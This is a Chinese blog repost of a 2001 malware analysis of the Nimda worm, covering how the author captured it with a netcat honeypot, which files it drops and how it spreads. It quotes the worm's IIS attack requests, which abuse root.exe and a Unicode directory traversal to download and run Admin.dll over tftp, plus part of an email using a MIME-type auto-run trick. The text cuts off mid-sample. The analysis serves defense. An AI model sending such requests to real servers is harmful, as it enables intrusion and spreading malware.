对尼姆达蠕虫的详细分析

本文详细分析了尼姆达蠕虫(Worm.Concept.57344,Nimda)的传播方式、影响系统、行为特征以及清除和预防策略。尼姆达通过电子邮件、WWW服务、局域网和Unicode漏洞进行传播,并创建后门,影响广泛。
摘要由CSDN通过智能技术生成

作者:tombkeeper

2001.9.18晚,我习惯性的打开了tcp/80,用这个简单的批处理程序:
-------------cut here-----------
@echo off
:start
nc -vv -w 5 -l -p 80>>httpd.log
goto start
--------------------------------
通常我用它来监测CodeXXX之类的分布,另外还指望运气好能弄到个把变种。
虽然偶尔会收到几个扫描代理服务器的噪声,但一般都是"rcvd 3818"。
忽然我发现从某个IP来了连续的几个一百字节左右的数据,打开httpd.log
一看原来是是一个http扫描,目的是寻找unicode_hole和CodeRedII建立的
root.exe。我没理它,可是在不到5分钟的时间里我连续收到了几个发自不
同IP的同种扫描,难道这就是CodeBlue?我开了一个真正的honeypot,不管
对方GET什么都回应"200 OK",结果马上就看到了实质性的东西:
"GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx GET Admin.dll HTTP/1.0"
好,满足你的要求。运行"tftp -i xxx.xxx.xxx.xxx GET Admin.dll",结
果马上就得到了好东西,赶紧反编译一下看看,然后再……@#$……%^&……
总算弄清楚了个大概,先写一个分析报告吧。

---------------------------------------------------------------

名称:Worm.Concept.57344 (Nimda/尼姆达)
名称:Nimda/尼姆达

一些反病毒厂商的命名:
Worm.Concept.57344
W32/Nimda.A@mm
W32/Nimda@mm
I-Worm.Nimda
类型:蠕虫/病毒
受影响的系统:Windows 95, Windows 98, Windows Me, Windows NT 4, Windows 2000
大小:57344字节


蠕虫文件:
[mmc.exe]
出现在windows文件夹,蠕虫扫描和创建tftpd的进程就是它。注意windows系统文件夹里也有
一个mmc.exe,那不是Nimda。

[riched20.dll]
riched20.dll除了出现在windows系统文件夹里,还可能出现在任何有*.doc文件的文件夹里。
因为它是winword.exe和wordpad.exe运行时都要调用的所以当打开DOC文件时就等于运行了Nimda。

[Admin.dll]
(Admin.dll除了在C:,D:,E:的根目录外还可出现在下面的"TFTP*****"出现的地方)

[load.exe]
出现在windows系统文件夹

[%temp%/readme*.exe]

[TFTP****]
形如TFTP3233。文件位置取决于使用tftp的目录。如果是
"GET /scripts/root.exe?/c+tftp -i [localIP] GET Admin.dll HTTP/1.0"
那么位置就在"Inetpub/scripts/"。如果是
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i [localIP] GET Admin.dll HTTP/1.0"
那么位置就在"/scripts/..%c1%1c../"也就是根目录。

/*以上都是蠕虫文件的可执行程序,它们之间的区别只有文件名不同*/

[readme.eml]
这个东西是值得一提的,他利用了IE5(或者说OE5)的一个漏洞。我们知道html格式
的邮件中图片和多媒体文件都是自动打开的,而可执行文件不是。但如果把可执行文件
指定为多媒体类型,也会自动下载打开。下面是readme.eml的一段:
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值